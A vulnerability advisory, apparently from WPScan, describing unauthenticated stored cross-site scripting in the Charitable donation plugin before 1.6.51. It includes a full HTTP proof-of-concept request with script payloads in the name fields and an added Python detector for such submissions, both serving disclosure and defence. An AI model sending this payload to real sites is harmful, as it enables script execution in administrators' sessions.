WPVDB-ID: E3B23F22-D019-4E20-A238-0FEB59A5760F (wpvulndb)
Jul 21, 2021 - 12:00 a.m.

Charitable - Donation Plugin < 1.6.51 - Unauthenticated Stored Cross-Site Scripting

Source: wpscan.com
Tags: charitable, donation, xss, unauthenticated, vulnerability, admin, exploited, issue, cross-site scripting, security

While fixing an Authenticated Stored Cross-Site Scripting issue (https://wpscan.com/vulnerability/a5837621-ee6e-4876-9f65-82658fc0341f), the vendor identified another Cross-Site Scripting issue, which could be exploited by unauthenticated users and would be triggered in the context of a logged-in admin.

PoC

Submit (as unauth) a donation with the script payload from the request below as First Name or Last Name, then view the donation lists as admin to trigger the XSS:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 501
Connection: close

charitable_form_id=60f1bb21849de&60f1bb21849de=&_charitable_donation_nonce=dd32c048d6&_wp_http_referer=%2Fwordpress%2Fcampaigns%2Ftest%2Fdonate%2F&campaign_id=1148&description=Test&ID=0&gateway=offline&custom_donation_amount=1.00&first_name=test%22%3E%3Cscript%3Ealert(%2FXSS-FN%2F)%3C%2Fscript%3E&last_name=test%22%3E%3Cscript%3Ealert(%2FXSS-LN%2F)%3C%2Fscript%3E&email=fjrekhg%40nferhf.com&address=&address_2=&city=&state=&postcode=&country=AF&phone=&action=make_donation&form_action=make_donation
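
A defender-side check for the request shape shown in the PoC, as an added example that is not part of the original advisory or the plugin's code: it scans captured `admin-ajax.php` form bodies (for example from a WAF or reverse proxy) for `make_donation` submissions whose `first_name` or `last_name` carries HTML metacharacters. The function name, the sample bodies and the choice of flagged characters are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

NAME_FIELDS = ("first_name", "last_name")  # the two fields named in the advisory
# Characters that break out of HTML text or a double-quoted attribute.
# The apostrophe is deliberately left out so names like O'Brien are not flagged.
MARKUP = re.compile(r'[<>"]')


def audit_donation_body(body):
    """Return (field, reason, decoded_value) findings for one urlencoded body."""
    form = parse_qs(body, keep_blank_values=True)  # decodes %xx and '+' once
    if "make_donation" not in form.get("action", []):
        return []  # not a donation submission
    findings = []
    for field in NAME_FIELDS:
        for value in form.get(field, []):
            if MARKUP.search(value):
                findings.append((field, "markup", value))
            elif MARKUP.search(unquote(value)):
                # Metacharacters appear only after a second decode.
                findings.append((field, "double-encoded markup", unquote(value)))
    return findings


# Constructed sample bodies; "page_poc" reuses the first_name value from the PoC.
SAMPLES = {
    "page_poc": "action=make_donation&first_name=test%22%3E%3Cscript%3E"
                "alert(%2FXSS-FN%2F)%3C%2Fscript%3E&last_name=Smith",
    "benign": "action=make_donation&first_name=Conan&last_name=O%27Brien",
    "double": "action=make_donation&first_name=a%2522%253E&last_name=x",
    "other_action": "action=heartbeat&first_name=%3Cb%3E",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, audit_donation_body(body))
```

Findings from such a scan point to donation records that should be reviewed; the fix on the site itself remains updating the plugin to 1.6.51 or later.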